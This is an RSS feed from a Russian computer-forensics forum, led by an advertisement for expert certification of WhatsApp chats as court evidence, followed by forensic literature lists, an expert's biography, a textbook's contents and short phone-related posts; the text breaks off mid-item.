<?xml version="1.0" encoding="windows-1251"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
	<channel>
		<atom:link href="https://expertiza.mybb.ru/export.php?type=rss" rel="self" type="application/rss+xml" />
		<title>Независимая компьютерная экспертиза Чебоксары</title>
		<link>http://expertiza.mybb.ru/</link>
		<description>Независимая компьютерная экспертиза Чебоксары</description>
		<language>ru-ru</language>
		<lastBuildDate>Sat, 05 Mar 2022 08:34:40 +0300</lastBuildDate>
		<generator>MyBB/mybb.ru</generator>
		<item>
			<title>Заверить переписку WhatsApp для суда</title>
			<link>http://expertiza.mybb.ru/viewtopic.php?pid=158#p158</link>
			<description>&lt;p&gt;&lt;span style=&quot;font-size: 20px&quot;&gt;Заверить переписку WhatsApp для суда&lt;/span&gt;&lt;/p&gt;
						&lt;p&gt;Необходимо нотариально заверить переписку WhatsApp? Нотариальное заверение не только не обязательно, но и часто оспаривается! Эксперт делает заверение переписки WhatsApp для суда быстрее и дешевле. Дистанционно от одного дня. В офисах Москвы, Санкт-Петербурга за несколько часов.&lt;/p&gt;
						&lt;p&gt;• Наше заключение принимают в суде&lt;br /&gt;• В отличие от нотариального заверения не оспаривают&lt;br /&gt;• Вернем деньги если не примут&lt;br /&gt;&lt;/p&gt;
						&lt;p&gt;&lt;span style=&quot;font-size: 20px&quot;&gt;Зачем заверять переписку WhatsApp для суда&lt;/span&gt;&lt;/p&gt;
						&lt;p&gt;Заверение электронной переписки требуется для фиксации спорных вопросов, явно непрописанных в договоре и доказательства иных договоренностей, не оформленных в надлежащем законом образом.&lt;/p&gt;
						&lt;p&gt;Например, объем и стоимость работ, были оговорены не в виде документа, а в электронной переписке. В мессенджере обещали перечисления алиментов, долгов, происходили угрозы и оскорбления.&lt;/p&gt;
						&lt;p&gt;Просто прийти в суд и показать телефон или ноутбук, а также показать распечатку, нельзя. Для того чтобы доказательства имели юридическую силу, необходимо заверить переписку специалистами.&lt;/p&gt;
						&lt;p&gt;Вот самые распространенные случае, когда требуется заверение.&lt;/p&gt;
						&lt;p&gt;• Деловая переписка&lt;br /&gt;• Трудовые споры&lt;br /&gt;• Семейные споры&lt;br /&gt;• Не возвращённые долги&lt;br /&gt;• Клевета, угрозы, лживые обвинения&lt;br /&gt;• Не выплата алиментов&lt;br /&gt;• Качество и факты оказания услуг&lt;br /&gt;&lt;br /&gt;&lt;/p&gt;
						&lt;p&gt;&lt;span style=&quot;font-size: 20px&quot;&gt;Почему не обязательно делать нотариальное заверение WhatsApp&lt;/span&gt;&lt;/p&gt;
						&lt;p&gt;Часто в суде или от адвокатов можно услышать, что требуется нотариальное заверение электронной переписки. Однако последние годы заверением чаще занимаются профильные специалисты. Услуги последних дешевле и точно также принимаются в судах.&lt;/p&gt;
						&lt;p&gt;Кроме того, нотариальный протокол закономерно не содержит информации о достоверности, переписки которую нотариусу показывали, если он не привлек для этого эксперта, обладающего специальными знаниями в данной специфической области.&lt;/p&gt;
						&lt;p&gt;Прямого указания на необходимость именно нотариальной переписки нет. Скорее в процессуальном кодексе указано на важность проведения экспертизы именно экспертом.&lt;/p&gt;
						&lt;p&gt;[…..сведения о фактах, на основе которых суд устанавливает наличие или отсутствие обстоятельств…… могут быть получены из объяснений сторон и третьих лиц, показаний свидетелей, письменных и вещественных доказательств, аудио- и видеозаписей, заключений экспертов] (Ст. 55 ГПК РФ Доказательства).&lt;/p&gt;
						&lt;p&gt;[Письменными доказательствами являются …….деловая корреспонденция, иные документы и материалы……в том числе полученные посредством факсимильной, электронной или другой связи, с использованием информационно-телекоммуникационной сети &amp;quot;Интернет&amp;quot;,…….либо выполненные иным позволяющим установить достоверность документа способом.] (ст. 71 ГПК РФ Письменные доказательства).&lt;/p&gt;
						&lt;p&gt;Так образом, заключения экспертов, подготовленные в форме письменных доказательств по исследованию достоверности деловой переписки, полученной с использованием информационной сети Интернет, могут выступать в качестве доказательств в суде.&lt;br /&gt;&lt;br /&gt;&lt;/p&gt;
						&lt;p&gt;&lt;span style=&quot;font-size: 20px&quot;&gt;Какие вопросы ставятся перед судебным экспертом&lt;/span&gt;&lt;/p&gt;
						&lt;p&gt;Объектом исследования в данном случае выступает учетная запись WhatsApp, закрепленная за конкретным абонентским номером. Носителем цифровой информации является Ваше мобильное устройство. В рамках подготовки заключения перед экспертом ставятся вопросы имеются ли в данной учетной записи признаки монтажа и следов внесения изменений? В случае их отсутствия эксперт фиксирует и приводит в заключение, часть (или всю) электронной переписки, имеющей отношение к рассматриваемому делу.&lt;br /&gt;&lt;/p&gt;
						&lt;p&gt;&lt;span style=&quot;font-size: 20px&quot;&gt;Случаи из практики&lt;/span&gt;&lt;/p&gt;
						&lt;p&gt;...Предприниматель – разместил в открытом доступе объявление рекламного характера...При помощи WhatsApp на учетную запись предпринимателя поступил заказ...Прибыв на место, водителем погрузчика были высказаны сомнения...&lt;/p&gt;
						&lt;p&gt;...Организация для проведения ремонтных работ была нанята строительно-подрядная фирма...Объем и условия оговаривались через электронную почту...возникла спорная ситуация...С целью подтверждения своих доводов фирма обратилась...&lt;/p&gt;
						&lt;p&gt;...Физическое лицо взяло в долг денежные средства у другого по расписке. По истечению длительного срока, лицо занявшее денежные средства, отказалось возвращать долг. Оригинал расписки был утерян, но у другого лица расписка была зафиксирована в виде фотоизображения на мобильном устройстве... В рамках исследования цифрового фотоизображения, сделанное с помощью мобильного устройства, экспертом АНО СЭЦ «СПЕЦИАЛИСТ»...&lt;/p&gt;
						&lt;p&gt;...Владелец транспортного средства предоставлял свою машину в аренду по доверенности. Арендатор данного ТС, после истечения срока аренды, решил оставить машину на улице, сообщив об этом владельцу с помощью электронной переписки, но заранее не согласовав данный вопрос. После Владелец обнаружил, что машина была эвакуирована на штраф стоянку...В рамках исследования электронной переписки, осуществляемой с помощью мобильного приложения «WhatsApp»&lt;br /&gt;&lt;/p&gt;
						&lt;p&gt;&lt;span style=&quot;font-size: 20px&quot;&gt;Как происходит исследование переписки&lt;/span&gt;&lt;/p&gt;
						&lt;p&gt;После того как мы предварительно обсудим проблему вы предоставляете доступ к Web-версии вашего аккаунта в WhatsApp (если предполагаете делать удаленно) или приносите в один из наших офисов устройство. Кстати возможен осмотр через программы удаленного просмотра типа Teamviewer, AnyDesk, Google - сервисы.&lt;/p&gt;
						&lt;p&gt;Затем экспертом проводится исследование с изъятием необходимой для заключения цифровой информации.&lt;/p&gt;
						&lt;p&gt;После этого, определяется общая стоимость подготовки заключения, заключается договор и производится предоплата в объеме 50%, от общей стоимости, любым удобным для Вас способом (через сайт, по присланной ссылке, через банк, либо наличными)&lt;/p&gt;
						&lt;p&gt;Далее, происходит подготовка заключения, в обговоренные сроки, с последующем направлением Вам проекта заключения для изучения. В случае если заключение Вас и/или Вашего адвоката устраивает Вы производите полную оплату.&lt;/p&gt;
						&lt;p&gt;Готовое и согласованное заключение в сшитом виде, с дипломами эксперта и подписанное им, передается Вам нарочно, если Вы забираете его в наших офисах, либо направляется Вам экспресс почтой. К заключению прикладывается акт выполненных работ и кассовый чек об оплате выполненных услуг.&lt;br /&gt;&lt;/p&gt;
						&lt;p&gt;&lt;span style=&quot;font-size: 20px&quot;&gt;Сколько времени занимает экспертиза переписки WhatsApp&lt;/span&gt;&lt;/p&gt;
						&lt;p&gt;Данное исследование имеет ряд плюсов перед нотариальным осмотром, а именно: Заключение компьютерно-технического эксперта готовятся в предельно сжатые сроки. В зависимости от объема имеющий отношения к делу переписки WhatsApp - от нескольких часов, до трех дней.&lt;br /&gt;&lt;/p&gt;
						&lt;p&gt;&lt;span style=&quot;font-size: 20px&quot;&gt;Можно ли заверить переписку дистанционно?&lt;/span&gt;&lt;/p&gt;
						&lt;p&gt;Да. Почти все переписки мы заверяем дистанционно.&lt;/p&gt;
						&lt;p&gt;По результатам исследования проект заключения направляется Вам на электронную почту, а оригиналы договоров, актов и кассовый чек – экспресс почтой. Поэтому исследование проводится для всех городов и судебных участков по все России.&lt;br /&gt;&lt;/p&gt;
						&lt;p&gt;&lt;span style=&quot;font-size: 20px&quot;&gt;Как правильно приобщить заверенную переписку&lt;/span&gt;&lt;/p&gt;
						&lt;p&gt;При подаче заключения, с целью приобщения к материалам дела следует подготовить ходатайство, в котором, в краткой форме изложить тот тезис, который Вы доказываете при помощи переписки с просьбой приобщить заключение компьютерно-технического эксперта.&lt;/p&gt;
						&lt;p&gt;Данном ходатайстве следует также указать на текущие судебные практики. Одним из примеров такой практики является Постановление №09АП-17964/2009-ГК от 30.10.2009, где сказано, что «Основными законами Российской Федерации о нотариальной деятельности и Арбитражным процессуальным кодексом не предписывается, что информация, размещенная в Интернете должна заверяться исключительно нотариусами»&lt;/p&gt;
						&lt;p&gt;Другим способом приобщения заключения – является его отправка по почте с приложением тоже ходатайства или через систему судебного электронного документооборота. Для этих целей нами в адрес заказчика направляется электронная копия заключения, подписанная ЭЦП.&lt;br /&gt;&lt;/p&gt;
						&lt;p&gt;&lt;span style=&quot;font-size: 20px&quot;&gt;Какие гарантии что переписку примут в суде&lt;/span&gt;&lt;/p&gt;
						&lt;p&gt;Отвечая на данный вопрос следует брать во внимание, что у судей, так же, как и у всех есть свои взгляды и предрассудки. Долгое время электронные переписки приобщались только при помощи нотариальных осмотров, хотя как уже было сказано выше, ни из одного нормативного документа это не следует. Сейчас, когда экспертное заверение становится все более и более распространённым, обоснованным, когда имеется уже значительная практика их использования можно с уверенностью сказать, что суды принимают заключения экспертов точно также, как и нотариальные.&lt;/p&gt;
						&lt;p&gt;На нашей практике был действительно 1 случай, когда экспертизу не приняли. Однако по последующей информации заключение было преподнесено не должным образом и присутствовал, определенный негатив между стороной и судьей. Тем не менее, если все же возникнет прецедент, что заключение судом будет мотивированно отклонено, по причине необходимости нотариального осмотра, мы готовы вернуть деньги.&lt;/p&gt;</description>
			<author>mybb@mybb.ru (Специалист)</author>
			<pubDate>Sat, 05 Mar 2022 08:34:40 +0300</pubDate>
			<guid>http://expertiza.mybb.ru/viewtopic.php?pid=158#p158</guid>
		</item>
		<item>
			<title>Противоречивость выводов КТЭ. Прошу оценить и подсказать.</title>
			<link>http://expertiza.mybb.ru/viewtopic.php?pid=145#p145</link>
			<description>&lt;p&gt;&lt;a href=&quot;http://fastpic.ru/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;&lt;img class=&quot;postimg&quot; loading=&quot;lazy&quot; src=&quot;http://i59.fastpic.ru/big/2015/1029/c7/8c376946bc0e01939271423f670a66c7.jpg&quot; alt=&quot;http://i59.fastpic.ru/big/2015/1029/c7/8c376946bc0e01939271423f670a66c7.jpg&quot; /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://fastpic.ru/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;&lt;img class=&quot;postimg&quot; loading=&quot;lazy&quot; src=&quot;http://i59.fastpic.ru/big/2015/1029/be/3ff69eccc108a01ae043121c35f6cabe.jpg&quot; alt=&quot;http://i59.fastpic.ru/big/2015/1029/be/3ff69eccc108a01ae043121c35f6cabe.jpg&quot; /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://fastpic.ru/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;&lt;img class=&quot;postimg&quot; loading=&quot;lazy&quot; src=&quot;http://i59.fastpic.ru/big/2015/1029/0b/78ca36f2d83ea5d52001c5751a05e20b.jpg&quot; alt=&quot;http://i59.fastpic.ru/big/2015/1029/0b/78ca36f2d83ea5d52001c5751a05e20b.jpg&quot; /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://fastpic.ru/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;&lt;img class=&quot;postimg&quot; loading=&quot;lazy&quot; src=&quot;http://i59.fastpic.ru/big/2015/1029/e4/4f08c32d725325215f47db8daf8938e4.jpg&quot; alt=&quot;http://i59.fastpic.ru/big/2015/1029/e4/4f08c32d725325215f47db8daf8938e4.jpg&quot; /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://fastpic.ru/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;&lt;img class=&quot;postimg&quot; loading=&quot;lazy&quot; src=&quot;http://i59.fastpic.ru/big/2015/1029/ce/ef674fd38d6d2f120202751b2a57ccce.jpg&quot; alt=&quot;http://i59.fastpic.ru/big/2015/1029/ce/ef674fd38d6d2f120202751b2a57ccce.jpg&quot; /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://fastpic.ru/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;&lt;img class=&quot;postimg&quot; loading=&quot;lazy&quot; src=&quot;http://i59.fastpic.ru/big/2015/1029/94/fca4cbc9339b4ed6470bb997f0482894.jpg&quot; alt=&quot;http://i59.fastpic.ru/big/2015/1029/94/fca4cbc9339b4ed6470bb997f0482894.jpg&quot; /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://fastpic.ru/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;&lt;img class=&quot;postimg&quot; loading=&quot;lazy&quot; src=&quot;http://i59.fastpic.ru/big/2015/1029/2b/1e9bf3f92ba8eb0d86265b7eea14492b.jpg&quot; alt=&quot;http://i59.fastpic.ru/big/2015/1029/2b/1e9bf3f92ba8eb0d86265b7eea14492b.jpg&quot; /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://fastpic.ru/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;&lt;img class=&quot;postimg&quot; loading=&quot;lazy&quot; src=&quot;http://i59.fastpic.ru/big/2015/1029/dd/b50361893083b4d4768dc1449124a1dd.jpg&quot; alt=&quot;http://i59.fastpic.ru/big/2015/1029/dd/b50361893083b4d4768dc1449124a1dd.jpg&quot; /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://fastpic.ru/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;&lt;img class=&quot;postimg&quot; loading=&quot;lazy&quot; src=&quot;http://i59.fastpic.ru/big/2015/1029/1e/aa17e407da2bb1a5e68c5ea9e29dd11e.jpg&quot; alt=&quot;http://i59.fastpic.ru/big/2015/1029/1e/aa17e407da2bb1a5e68c5ea9e29dd11e.jpg&quot; /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://fastpic.ru/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;&lt;img class=&quot;postimg&quot; loading=&quot;lazy&quot; src=&quot;http://i59.fastpic.ru/big/2015/1029/ee/6af8fa7e62cee8a71971b6a9967528ee.jpg&quot; alt=&quot;http://i59.fastpic.ru/big/2015/1029/ee/6af8fa7e62cee8a71971b6a9967528ee.jpg&quot; /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://fastpic.ru/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;&lt;img class=&quot;postimg&quot; loading=&quot;lazy&quot; src=&quot;http://i59.fastpic.ru/big/2015/1029/c8/7c56e72c6895c2bde76e8671fe989dc8.jpg&quot; alt=&quot;http://i59.fastpic.ru/big/2015/1029/c8/7c56e72c6895c2bde76e8671fe989dc8.jpg&quot; /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://fastpic.ru/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;&lt;img class=&quot;postimg&quot; loading=&quot;lazy&quot; src=&quot;http://i59.fastpic.ru/big/2015/1029/d7/9d1b22055b4ce6241cc7383a0f72a0d7.jpg&quot; alt=&quot;http://i59.fastpic.ru/big/2015/1029/d7/9d1b22055b4ce6241cc7383a0f72a0d7.jpg&quot; /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://fastpic.ru/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;&lt;img class=&quot;postimg&quot; loading=&quot;lazy&quot; src=&quot;http://i59.fastpic.ru/big/2015/1029/0b/668e2965c080e739137e58126acdef0b.jpg&quot; alt=&quot;http://i59.fastpic.ru/big/2015/1029/0b/668e2965c080e739137e58126acdef0b.jpg&quot; /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://fastpic.ru/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;&lt;img class=&quot;postimg&quot; loading=&quot;lazy&quot; src=&quot;http://i59.fastpic.ru/big/2015/1029/df/43ff356dbc946926f2e3d4cfc6b136df.jpg&quot; alt=&quot;http://i59.fastpic.ru/big/2015/1029/df/43ff356dbc946926f2e3d4cfc6b136df.jpg&quot; /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://fastpic.ru/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;&lt;img class=&quot;postimg&quot; loading=&quot;lazy&quot; src=&quot;http://i59.fastpic.ru/big/2015/1029/83/7284c73f790c9b127d231fcc1d793583.jpg&quot; alt=&quot;http://i59.fastpic.ru/big/2015/1029/83/7284c73f790c9b127d231fcc1d793583.jpg&quot; /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href=&quot;http://fastpic.ru/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;&lt;img class=&quot;postimg&quot; loading=&quot;lazy&quot; src=&quot;http://i59.fastpic.ru/big/2015/1029/50/9843ec30bea44605f4d73ad8138c5f50.jpg&quot; alt=&quot;http://i59.fastpic.ru/big/2015/1029/50/9843ec30bea44605f4d73ad8138c5f50.jpg&quot; /&gt;&lt;/a&gt;&lt;/p&gt;</description>
			<author>mybb@mybb.ru (igorev6)</author>
			<pubDate>Fri, 06 Nov 2015 10:05:59 +0300</pubDate>
			<guid>http://expertiza.mybb.ru/viewtopic.php?pid=145#p145</guid>
		</item>
		<item>
			<title>Списки литературы СКТЭ</title>
			<link>http://expertiza.mybb.ru/viewtopic.php?pid=142#p142</link>
			<description>&lt;p&gt;Карпухина Е.С., Усов А.И., Хатунцев Н.А., Эджубов Л.Г.,&lt;br /&gt;Роль компьютерно-технической экспертизы при решении комплексных задач&lt;/p&gt;
						&lt;p&gt;Карпухина Е.С., Усов А.И., Эджубов Л.Г.,&lt;br /&gt;Судебная компьютерно-техническая экспертиза и методы решения комплексных задач&lt;/p&gt;
						&lt;p&gt;Карпухина Е.С., Сидорова А.К.,&lt;br /&gt;Исследование вредоносных программ при производстве судебной компьютерно-технической экспертизы&lt;/p&gt;
						&lt;p&gt;Карпухина Е.С.,&lt;br /&gt;О Международном научно-практическом семинаре &amp;quot;Актуальные задачи судебной компьютерно-технической экспертизы&amp;quot;&lt;/p&gt;
						&lt;p&gt;Усов А.И.,&lt;br /&gt;Концептуальные основы судебной компьютерно-технической экспертизы.&lt;/p&gt;
						&lt;p&gt;Карпухина Е.С.,&lt;br /&gt;О способах и детализации описания исследования при производстве судебных компьютерно-технических экспертиз&lt;/p&gt;</description>
			<author>mybb@mybb.ru (counter)</author>
			<pubDate>Wed, 30 Sep 2015 08:48:46 +0300</pubDate>
			<guid>http://expertiza.mybb.ru/viewtopic.php?pid=142#p142</guid>
		</item>
		<item>
			<title>Судебная компьютерно-техническая экспертиза</title>
			<link>http://expertiza.mybb.ru/viewtopic.php?pid=139#p139</link>
			<description>&lt;p&gt;Россинская Елена Рафаиловна, доктор юридических наук, профессор. В 1972 году с отличием окончила Московский институт тонкой химической технологии им. М.В. Ломоносова (ныне Академия тонкой химической технологии им. М.В. Ломоносова ). Дипломная работа выполнялась под руководством известного ученого-физика профессора А.И. Китайгородского в лаборатории рентгеноструктурного анализа Института элементоорганических соединений АН СССР и была посвящена рентгеноструктурному анализу сложных золотоорганических комплексных соединений. С 1972 по 1979 г. занималась проблемами рентгеноструктурного анализа и разработала ряд методик рентгеновского исследования металлов и сплавов, тонких оксидных пленок.&lt;/p&gt;
						&lt;p&gt;С 1979 года, находилась на практической и научной работе в экспертно-криминалистических подразделениях органов внутренних дел, где занималась научными исследованиями в области судебной экспертизы веществ и материалов и пожарно-технической экспертизы, разработкой методик рентгеноструктурного и рентгеноспектрального анализа объектов судебных экспертиз. Ею выполнено более 5000 судебных экспертиз.&lt;/p&gt;
						&lt;p&gt;1989 – 2001 доцент и профессор кафедры криминалистики Юридического института МВД РФ. Полковник милиции в отставке. С 2001 года профессор кафедры криминалистики, а с февраля 2005 г. директор Института судебных экспертиз Московской государственной юридической академии, одновременно заведует кафедрой судебных экспертиз МГЮА, научный руководитель направления по подготовке судебных экспертов инженерно-технических экспертиз в МГТУ им. Н.Э. Баумана.&lt;/p&gt;
						&lt;p&gt;С 1988 г. Е.Р. Россинская – кандидат юридических наук. Тема кандидатской диссертации «Комплексные криминалистические экспертизы с применением рентгеновских методов исследования материалов, веществ и изделий. С 1993 г. она доктор юридических наук. Тема докторской диссертации «Концептуальные основы теории неразрушающих методов исследования вещественных доказательств». С 1995 г. – профессор. С 1994 года Е.Р. Россинская действительный член Международной ассоциации по идентификации (IAI USA), с 1998 года академик Международной академии информатизации, с 2002 года академик Российской академии естественных наук.&lt;br /&gt;В июне 2000 г. Е.Р. Россинской присвоено звание Заслуженный деятель науки Российской Федерации.&lt;/p&gt;
						&lt;p&gt;В июне 2009 г. Е.Р. Россинской присвоено звание Почетного работника высшего профессионального образования Российской Федерации.&lt;/p&gt;</description>
			<author>mybb@mybb.ru (counter)</author>
			<pubDate>Wed, 30 Sep 2015 08:21:33 +0300</pubDate>
			<guid>http://expertiza.mybb.ru/viewtopic.php?pid=139#p139</guid>
		</item>
		<item>
			<title>Судебно-экспертное исследование компьютерных средств и систем</title>
			<link>http://expertiza.mybb.ru/viewtopic.php?pid=136#p136</link>
			<description>&lt;p&gt;Усов А.И., Под ред.: Россинская Е.Р.:&lt;br /&gt;&lt;span style=&quot;font-size: 20px&quot;&gt;Судебно-экспертное исследование компьютерных средств и систем. Основы методического обеспечения: Учебное пособие&lt;/span&gt;&lt;/p&gt;
						&lt;p&gt;Тип: Издание&lt;br /&gt;Авторы: Усов А.И., Под ред.: Россинская Е.Р.&lt;br /&gt;Издательство: Право и Закон, Экзамен&lt;br /&gt;Место издания: Москва&lt;br /&gt;Количество страниц: 368&lt;br /&gt;Год издания: 2003 г.&lt;/p&gt;
						&lt;p&gt;Оглавление:&lt;/p&gt;
						&lt;p&gt;Введение&lt;/p&gt;
						&lt;p&gt;Глава 1. Требования к методическому обеспечению судебной компьютерно-технической экспертизы&lt;br /&gt;§ 1. Состав и содержание методического обеспечения СКТЭ&lt;br /&gt;§ 2. Сущность основных требований к методам и средствам судебной компьютерно-технической экспертизы&lt;br /&gt;§ 3. Взаимосвязь методического обеспечения с результатами оценки заключения судебной компьютерно-технической экспертизы следователем и судом&lt;br /&gt;§ 4. Пути повышения качества методического обеспечения СКТЭ&lt;br /&gt;§ 5. Сущность общей экспертной методики по исследованию объектов СКТЭ&lt;br /&gt;§ 6. Общие сведения о профессиональных пакетах прикладных программ судебно-экспертного исследования компьютерных систем&lt;/p&gt;
						&lt;p&gt;Глава 2. Сущность, средства и способы диагностирования компьютерных средств исистем&lt;br /&gt;§ 1. Экспертная диагностика установок базовой системы ввода-вывода&lt;br /&gt;§ 2. Экспертные средства обеспечения доступа к информации на дисковых носителях информации&lt;br /&gt;§ 3. Утилиты копирования (клонирования) дисков&lt;br /&gt;§ 4. Диагностика реестра операционной системы MS Windows&lt;br /&gt;§ 5. Сервисные утилиты как универсальный экспертный инструментарий&lt;br /&gt;§ 6. Применение файловых менеджеров в экспертных исследованиях&lt;br /&gt;§ 7. Программа создания и изменения разделов жесткого диска Partition Magic&lt;br /&gt;§ 8. Методическое обеспечение диагностирования компакт-дисков&lt;/p&gt;
						&lt;p&gt;Глава 3. Методические подходы по применению основных методов и средств исследования типичных объектов СКТЭ&lt;br /&gt;§ 1. Классификация объектов судебной компьютерно-технической экспертизы&lt;br /&gt;§ 2. Задачи экспертного исследования информационных объектов СКТЭ&lt;br /&gt;§ 3. Судебно-экспертное исследование текстовых файлов&lt;br /&gt;§ 4. Утилиты для решения экспертных задач по поиску и сравнению файлов&lt;br /&gt;§ 5. Методические приемы и программные средства исследования графических объектов СКТЭ&lt;br /&gt;§ 6. Программные средства восстановления удаленных файлов&lt;/p&gt;
						&lt;p&gt;Глава 4. Основные положения по судебно-экспертному исследованию программных средств&lt;br /&gt;§ 1. Виды и способы представления программных средств на СКТЭ&lt;br /&gt;§ 2. Основные средства и методы исследования программных объектов СКТЭ &lt;br /&gt;§ 3. Программные средства мониторинга процессов в системе&lt;br /&gt;§ 4. Возможности использования технологии Reverse Engineering в СКТЭ&lt;br /&gt;§ 5. Основные методы доступа к алгоритмам программных средств&lt;br /&gt;§ 6. Программные средства экспертного исследования вредоносных программ&lt;/p&gt;
						&lt;p&gt;Глава 5. Методические подходы к исследованию компьютерной информации, сопряженной с работой в сети Интернет&lt;br /&gt;§ 1. Вопросы по экспертному исследованию информации, сопряженной с работой в сети Интернет&lt;br /&gt;§ 2. Экспертные задачи, решаемые при исследовании информации, сопряженной с работой в Интернет&lt;br /&gt;§ 3. Описание и краткая характеристика объектов исследования&lt;br /&gt;§ 4. Характеристика используемых экспертных средств&lt;br /&gt;§ 5. Последовательность действий эксперта СКТЭ по исследованию информации, сопряженной с работой в сети Интернет &lt;br /&gt;§ 6. Некоторые особенности формулирования выводов по экспертному исследованию информации, сопряженной с работой в сети Интернет&lt;/p&gt;
						&lt;p&gt;Глава 6. Особенности экспертной диагностики защищенной компьютерной информации&lt;br /&gt;§ 1. Основные сведения о криптографической защите компьютерных данных&lt;br /&gt;§ 2. Актуальные аспекты экспертного исследования защищенной информации в архивах и офисных программах&lt;br /&gt;§ 3. Проблемы производства судебно-экспертного исследования компьютерной информации, защищенной стеганографическими средствами&lt;/p&gt;
						&lt;p&gt;Глава 7. Актуальные проблемы и некоторые возможности судебно-экспертного исследования компьютерных систем в гражданском судопроизводстве&lt;br /&gt;§ 1. Методические основы проведения СКТЭ в арбитражных процессах&lt;br /&gt;§ 2. Особенности проведения комплексной СКТЭ и патентоведческой экспертизы компьютерных средств&lt;/p&gt;
						&lt;p&gt;Заключение&lt;br /&gt;Библиография&lt;/p&gt;
						&lt;p&gt;Приложения&lt;br /&gt;1. Примерный паспорт типовой методики СКТЭ&lt;br /&gt;2. Справочные данные о комплексе РС-3000&lt;br /&gt;3. Справочник по расширениям имен файлов операционных систем MS DOS и Windows&lt;br /&gt;4. Перечень ссылок на информационные ресурсы сети Интернет, рекомендуемых для ознакомления эксперту СКТЭ&lt;br /&gt;5. Типичное содержание исследовательской части судебной экспертизы программных средств (на примере дела об «электронном лохотроне»)&lt;br /&gt;6. Основные характеристики и особенности антивирусных пакетов программ&lt;br /&gt;7. Типовая программа подготовки экспертов СКТЭ по специальности «Исследование информационных компьютерных средств»&lt;br /&gt;8. Перечень стандартов, рекомендуемых для изучения и использования при решении задач СКТЭ&lt;/p&gt;</description>
			<author>mybb@mybb.ru (counter)</author>
			<pubDate>Wed, 30 Sep 2015 08:13:40 +0300</pubDate>
			<guid>http://expertiza.mybb.ru/viewtopic.php?pid=136#p136</guid>
		</item>
		<item>
			<title>Телефоны, смартфоны. Терминология</title>
			<link>http://expertiza.mybb.ru/viewtopic.php?pid=135#p135</link>
			<description>&lt;p&gt;IMEI&amp;#160; *#06#&lt;/p&gt;
						&lt;p&gt;Сервисные коды&lt;/p&gt;
						&lt;p&gt;Инженерное меню&lt;/p&gt;
						&lt;p&gt;root права&lt;/p&gt;</description>
			<author>mybb@mybb.ru (counter)</author>
			<pubDate>Fri, 25 Sep 2015 07:15:28 +0300</pubDate>
			<guid>http://expertiza.mybb.ru/viewtopic.php?pid=135#p135</guid>
		</item>
		<item>
			<title>Мобильный телефон Explay Indigo</title>
			<link>http://expertiza.mybb.ru/viewtopic.php?pid=134#p134</link>
			<description>&lt;p&gt;Мобильный телефон Explay Indigo&lt;/p&gt;
						&lt;p&gt;Indigo | Техническая поддержка Explay&lt;br /&gt;support.explay.ru›Indigo&lt;/p&gt;
						&lt;p&gt;Инструкция по эксплуатации Indigo&lt;/p&gt;</description>
			<author>mybb@mybb.ru (counter)</author>
			<pubDate>Wed, 23 Sep 2015 14:35:39 +0300</pubDate>
			<guid>http://expertiza.mybb.ru/viewtopic.php?pid=134#p134</guid>
		</item>
		<item>
			<title>Независимая экспертиза компьютерной техники</title>
			<link>http://expertiza.mybb.ru/viewtopic.php?pid=133#p133</link>
			<description>&lt;p&gt;&lt;span style=&quot;font-size: 20px&quot;&gt;Sony Xperia&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;quote-box answer-box&quot;&gt;&lt;cite&gt;Покупатель написал(а):&lt;/cite&gt;&lt;blockquote&gt;&lt;p&gt;Здравствуйте. На телефоне Sony Xperia acro S обнаружил 4 &amp;quot;дефектных&amp;quot; (2 ярких + 2 менее ярких) пикселя, т.е 4 светлые точки на черном фоне. В авторизованном сервисном центре считают, что аппарат исправен, замечая только 2 дефектных пикселя.&lt;/p&gt;
						&lt;p&gt;Согласно пункту 3 Ограниченной гарантии телефонов Sony Mobile, считается допустимым наличие на дисплее двух дефектных пикселов:&lt;/p&gt;
						&lt;p&gt;«Возможно также наличие на дисплее ярких и темных точек. Эти точки (дефектные пикселы) появляются вследствие отказа отдельных элементов дисплея; устранение таких дефектов невозможно. Считается допустимым наличие двух дефектных пикселов».&lt;/p&gt;
